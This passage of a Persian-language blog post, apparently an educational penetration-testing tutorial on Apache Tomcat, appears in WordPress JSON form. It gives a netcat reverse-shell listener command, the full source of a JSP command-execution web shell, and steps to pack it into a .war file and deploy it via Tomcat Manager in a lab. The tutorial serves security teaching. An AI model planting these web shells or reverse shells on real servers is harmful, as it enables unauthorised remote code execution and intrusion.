class=\"alignnone  wp-image-19489\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-300x133.png\" alt=\"\" width=\"537\" height=\"238\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-300x133.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-768x341.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-150x67.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2.png 1006w\" sizes=\"(max-width: 537px) 100vw, 
537px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u06cc\u0634 \u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0641\u0627\u06cc\u0644 upload \u0634\u062f\u0647\u060c \u06cc\u06a9 netcat listener \u0631\u0648\u06cc \u067e\u0648\u0631\u062a \u06f1\u06f2\u06f3\u06f4 \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">rlwrap nc -lvnp 1234<\/pre>\n<p><span style=\"font-size: 10pt\">\u0628\u0631 \u0631\u0648\u06cc \u0645\u0633\u06cc\u0631 \/shell \u06a9\u0644\u06cc\u06a9 \u06a9\u0646\u06cc\u062f \u062a\u0627 \u0628\u0647 \u0641\u0627\u06cc\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u06cc\u0627\u0641\u062a\u0647 \u0648 reverse shell \u0631\u0627 \u062f\u0631\u06cc\u0627\u0641\u062a \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19490\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2-300x108.png\" alt=\"\" width=\"547\" height=\"197\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2-300x108.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2-150x54.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/18-2.png 587w\" sizes=\"(max-width: 547px) 100vw, 547px\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 10pt\">Reverse shell \u0627\u0632 \u0637\u0631\u06cc\u0642 \u067e\u0648\u0631\u062a \u06f1\u06f2\u06f3\u06f4 \u062f\u0631\u06cc\u0627\u0641\u062a \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19491\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-300x210.png\" alt=\"\" width=\"540\" height=\"378\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-300x210.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-768x538.png 
768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2-150x105.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/19-2.png 970w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/p>\n<h2><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong> <strong>Web Shell<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0628\u0647\u200c\u062f\u0633\u062a\u200c\u0622\u0648\u0631\u062f\u0646 \u06cc\u06a9 web shell\u060c \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f \u06a9\u0647 \u0634\u0627\u0645\u0644 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc .jsp \u0628\u0627\u0634\u062f. \u067e\u0633 \u0627\u0632 upload \u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 .war \u0628\u0647 \u0633\u0631\u0648\u0631\u060c \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 webshell \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0647\u200c\u0645\u0646\u0638\u0648\u0631 \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war \u06a9\u0647 \u0634\u0627\u0645\u0644 \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc .jsp \u0628\u0627\u0634\u062f\u060c \u0644\u0627\u0632\u0645 \u0627\u0633\u062a \u06a9\u0647 Java \u0631\u0648\u06cc \u0645\u0627\u0634\u06cc\u0646 Kali Linux \u0646\u0635\u0628 \u0634\u062f\u0647 \u0628\u0627\u0634\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">apt install openjdk-21-jdk<\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06a9\u0646\u0648\u0646 \u06cc\u06a9 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc \u0628\u0647 \u0646\u0627\u0645 webshell \u0627\u06cc\u062c\u0627\u062f \u06a9\u0646\u06cc\u062f \u0648 \u0641\u0627\u06cc\u0644 index.jsp 
\u0631\u0627 \u062f\u0631\u0648\u0646 \u0622\u0646 \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">mkdir webshell\r\ncd webshell\r\nnano index.jsp\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19492\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2-300x129.png\" alt=\"\" width=\"528\" height=\"227\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2-300x129.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2-150x64.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/20-2.png 571w\" sizes=\"(max-width: 528px) 100vw, 528px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u06a9\u062f \u0632\u06cc\u0631 \u0631\u0627 \u062f\u0631 \u0641\u0627\u06cc\u0644 index.jsp \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f \u062a\u0627 web shell \u0627\u06cc\u062c\u0627\u062f \u0634\u0648\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;FORM METHOD=GET ACTION='index.jsp'&gt;\r\n&lt;INPUT name='cmd' type=text&gt;\r\n&lt;INPUT type=submit value='Run'&gt;\r\n&lt;\/FORM&gt;\r\n&lt;%@ page import=\"java.io.*\" %&gt;\r\n&lt;%\r\n   String cmd = request.getParameter(\"cmd\");\r\n   String output = \"\";\r\n   if(cmd != null) {\r\n      String s = null;\r\n      try {\r\n         Process p = Runtime.getRuntime().exec(cmd,null,null);\r\n         BufferedReader sI = new BufferedReader(new\r\nInputStreamReader(p.getInputStream()));\r\n         while((s = sI.readLine()) != null) { output += s+\"&lt;\/br&gt;\"; }\r\n      }  catch(IOException e) {   e.printStackTrace();   }\r\n   }\r\n%&gt;\r\n&lt;pre&gt;&lt;%=output %&gt;&lt;\/pre&gt;<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19493\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-300x179.png\" alt=\"\" width=\"558\" 
height=\"333\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-300x179.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-1024x609.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-768x457.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2-150x89.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/21-2.png 1030w\" sizes=\"(max-width: 558px) 100vw, 558px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0641\u0627\u06cc\u0644 index.jsp\u060c \u0627\u06a9\u0646\u0648\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u062a\u0628\u062f\u06cc\u0644 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc \u0628\u0647 \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war\u060c \u0628\u0633\u062a\u0647\u200c\u06cc \u0645\u0648\u0631\u062f\u0646\u0638\u0631 \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">jar -cvf ..\/webshell.war *<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19494\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-300x56.png\" alt=\"\" width=\"568\" height=\"106\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-300x56.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-1024x192.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-768x144.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2-150x28.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/22-2.png 1046w\" sizes=\"(max-width: 568px) 100vw, 568px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0641\u0627\u06cc\u0644 webshell.war\u060c \u0622\u0646 \u0631\u0627 \u0627\u0632 
\u0637\u0631\u06cc\u0642 \u0628\u062e\u0634 deploy \u062f\u0631 Tomcat Manager \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19495\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-300x102.png\" alt=\"\" width=\"574\" height=\"195\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-300x102.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-768x260.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2-150x51.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/23-2.png 960w\" sizes=\"(max-width: 574px) 100vw, 574px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0635\u0641\u062d\u0647\u200c\u06cc index.jsp \u062f\u0631\u0648\u0646 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc webshell \u06a9\u0647 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u0642\u0627\u0628\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0633\u062a \u0648 \u0628\u0647 \u0627\u06cc\u0646 \u062a\u0631\u062a\u06cc\u0628 webshell \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19496\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1-300x98.png\" alt=\"\" width=\"576\" height=\"188\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1-300x98.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1-150x49.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/24-1.png 698w\" sizes=\"(max-width: 576px) 100vw, 576px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19497\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-300x189.png\" alt=\"\" width=\"579\" height=\"365\" 
srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-300x189.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-1024x647.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-768x485.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1-150x95.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/25-1.png 1034w\" sizes=\"(max-width: 579px) 100vw, 579px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0631\u0648\u0634 \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0628\u0631\u0627\u06cc \u0627\u0646\u062c\u0627\u0645 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc \u0641\u0648\u0642\u060c \u062f\u0627\u0646\u0644\u0648\u062f \u0641\u0627\u06cc\u0644 cmd.jsp \u0648 \u0633\u0627\u062e\u062a \u0641\u0627\u06cc\u0644 webshell.war \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631 zip \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0641\u0627\u06cc\u0644 webshell jsp \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0627\u06cc\u0646 <a href=\"https:\/\/github.com\/tennc\/webshell\/tree\/master\/fuzzdb-webshell\/jsp\">\u0622\u062f\u0631\u0633<\/a> \u062f\u0627\u0646\u0644\u0648\u062f \u06a9\u0631\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19498\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-298x300.png\" alt=\"\" width=\"516\" height=\"519\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-298x300.png 298w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-1017x1024.png 1017w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-150x151.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-768x773.png 768w, 
https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1-96x96.png 96w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/26-1.png 1072w\" sizes=\"(max-width: 516px) 100vw, 516px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0633\u067e\u0633\u060c \u067e\u0633 \u0627\u0632 \u062f\u0627\u0646\u0644\u0648\u062f \u0641\u0627\u06cc\u0644 cmd.jsp\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0641\u0627\u06cc\u0644 revshell.war \u0631\u0627 \u0627\u06cc\u062c\u0627\u062f \u06a9\u0631\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">zip -r revshell.war cmd.jsp<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19499\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-300x126.png\" alt=\"\" width=\"540\" height=\"227\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-300x126.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-1024x430.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-768x323.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1-150x63.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/27-1.png 1285w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0648\u0628\u0627\u0631\u0647\u060c \u0628\u0627 \u062a\u06a9\u0631\u0627\u0631 \u0647\u0645\u0627\u0646 \u0631\u0648\u0646\u062f\u06cc \u06a9\u0647 \u067e\u06cc\u0634\u200c\u062a\u0631 \u062a\u0648\u0636\u06cc\u062d \u062f\u0627\u062f\u0647 \u0634\u062f\u060c \u067e\u0633 \u0627\u0632 upload \u0641\u0627\u06cc\u0644 revshell.war \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0628\u0644\u06cc\u062a deploy\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc 
\u0628\u0647 \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631\u060c web shell \u0631\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0648\u0631\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">http:\/\/192.168.1.5:8080\/revshell\/cmd.jsp<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19500\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1-300x108.png\" alt=\"\" width=\"536\" height=\"193\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1-300x108.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1-150x54.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/28-1.png 712w\" sizes=\"(max-width: 536px) 100vw, 536px\" \/><\/p>\n<h2><strong>\u062c\u0645\u0639\u200c\u0628\u0646\u062f\u06cc<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u0635\u0644\u060c Apache Tomcat \u0647\u0645\u0686\u0646\u0627\u0646 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9\u06cc \u0627\u0632 \u06af\u0632\u06cc\u0646\u0647\u200c\u0647\u0627\u06cc \u0645\u062d\u0628\u0648\u0628 \u0628\u0631\u0627\u06cc deploy \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0648\u0628 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 Java \u0628\u0627\u0642\u06cc \u0645\u0627\u0646\u062f\u0647 \u0627\u0633\u062a \u0648 \u062a\u0631\u06a9\u06cc\u0628\u06cc \u0627\u0632 \u0627\u0646\u0639\u0637\u0627\u0641\u200c\u067e\u0630\u06cc\u0631\u06cc \u0648 \u0627\u0645\u0646\u06cc\u062a \u0631\u0627 \u0627\u0631\u0627\u0626\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u067e\u0627\u0633\u062e\u06af\u0648\u06cc \u0646\u06cc\u0627\u0632\u0647\u0627\u06cc \u0645\u062a\u0646\u0648\u0639 \u062a\u0648\u0633\u0639\u0647\u200c\u062f\u0647\u0646\u062f\u06af\u0627\u0646 \u0648 \u0645\u062f\u06cc\u0631\u0627\u0646 \u0633\u06cc\u0633\u062a\u0645 \u0627\u0633\u062a. 
\u0628\u0627 \u0627\u06cc\u0646 \u062d\u0627\u0644\u060c \u0628\u0647 \u062f\u0644\u06cc\u0644 misconfiguration\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u0636\u0639\u06cc\u0641 \u06cc\u0627 \u0642\u0627\u0628\u0644 \u062d\u062f\u0633 \u0628\u0631\u0627\u06cc Tomcat Manager \u0648 \u0641\u0639\u0627\u0644 \u0628\u0648\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u0647 \u0622\u0646\u060c \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0642\u0627\u062f\u0631 \u062e\u0648\u0627\u0647\u0646\u062f \u0628\u0648\u062f \u0627\u0632 \u0622\u0646 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u0648 \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0646\u0627\u062e\u0648\u0627\u0633\u062a\u0647\u200c\u0627\u06cc \u0645\u0627\u0646\u0646\u062f Remote Code Execution \u0631\u0627 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u0646\u062f.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tomcat Penetration Testing \u0646\u0642\u0634 \u062d\u06cc\u0627\u062a\u06cc \u062f\u0631 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 Apache Tomcat \u0627\u06cc\u0641\u0627 \u0645\u06cc\u200c\u06a9\u0646\u062f\u061b \u0633\u0631\u0648\u06cc\u0633\u06cc \u06a9\u0647 \u0628\u0647\u200c\u0637\u0648\u0631 \u06af\u0633\u062a\u0631\u062f\u0647 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u06cc\u06a9 web server \u0648 servlet container \u062f\u0631 \u062a\u0648\u0633\u0639\u0647\u200c\u06cc \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f. 
\u062f\u0631 \u0627\u0628\u062a\u062f\u0627\u060c Apache Software Foundation \u0627\u06cc\u0646 \u067e\u0631\u0648\u0698\u0647 \u0631\u0627 \u0628\u0627 \u0647\u062f\u0641 \u0627\u0631\u0627\u0626\u0647\u200c\u06cc \u06cc\u06a9 \u067e\u0644\u062a\u0641\u0631\u0645 \u0646\u0645\u0627\u06cc\u0634\u06cc \u0628\u0631\u0627\u06cc \u0641\u0646\u0627\u0648\u0631\u06cc\u200c\u0647\u0627\u06cc Java Servlet \u0648 JavaServer Pages &hellip;<\/p>\n","protected":false},"author":14,"featured_media":19501,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[258,275,349],"tags":[],"class_list":["post-19472","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-teaching","category-penetration-test-article","category-slides"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.5 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646<\/title>\n<meta name=\"description\" content=\"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a \u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/\" \/>\n<meta property=\"og:locale\" content=\"fa_IR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat\" \/>\n<meta property=\"og:description\" content=\"Apache Tomcat \u06cc\u06a9 open-source web server \u0648 servlet container \u0627\u0633\u062a 
\u06a9\u0647 \u062a\u0648\u0633\u0637 Apache Software Foundation \u062a\u0648\u0633\u0639\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/liangroup.net\/blog\/tomcat-penetration-testing\/\" \/>\n<meta property=\"og:site_name\" content=\"\u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 \u0644\u06cc\u0627\u0646\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-24T11:25:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/apache-tomcat-rce-exploit-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"728\" \/>\n\t<meta property=\"og:image:height\" content=\"380\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:site\" content=\"@liansecurity\" \/>\n<meta name=\"twitter:label1\" content=\"\u0646\u0648\u0634\u062a\u0647\u200c\u0634\u062f\u0647 \u0628\u062f\u0633\u062a\" \/>\n\t<meta name=\"twitter:data1\" content=\"\u0633\u062c\u0627\u062f \u062a\u06cc\u0645\u0648\u0631\u06cc\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u0632\u0645\u0627\u0646 \u062a\u0642\u0631\u06cc\u0628\u06cc \u0628\u0631\u0627\u06cc \u062e\u0648\u0627\u0646\u062f\u0646\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 \u062f\u0642\u06cc\u0642\u0647\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\"},\"author\":{\"name\":\"\u0633\u062c\u0627\u062f 
\u062a\u06cc\u0645\u0648\u0631\u06cc\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/#\\\/schema\\\/person\\\/e328f67a35a843fd3accc4666b5eab0a\"},\"headline\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat\",\"datePublished\":\"2025-05-24T11:25:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\"},\"wordCount\":320,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/apache-tomcat-rce-exploit-1.png\",\"articleSection\":[\"\u0622\u0645\u0648\u0632\u0634\u200c\u0647\u0627\u06cc \u0644\u06cc\u0627\u0646\",\"\u0645\u0642\u0627\u0644\u0627\u062a \u062a\u0633\u062a \u0646\u0641\u0648\u0630\",\"\u06cc\u06cc\u06cc\u06cc \u0627\u0633\u0644\u0627\u06cc\u062f\"],\"inLanguage\":\"fa-IR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\",\"url\":\"https:\\\/\\\/liangroup.net\\\/blog\\\/tomcat-penetration-testing\\\/\",\"name\":\"\u062a\u0633\u062a \u0646\u0641\u0648\u0630 Tomcat - \u0628\u0644\u0627\u06af \u06af\u0631\u0648\u0647 
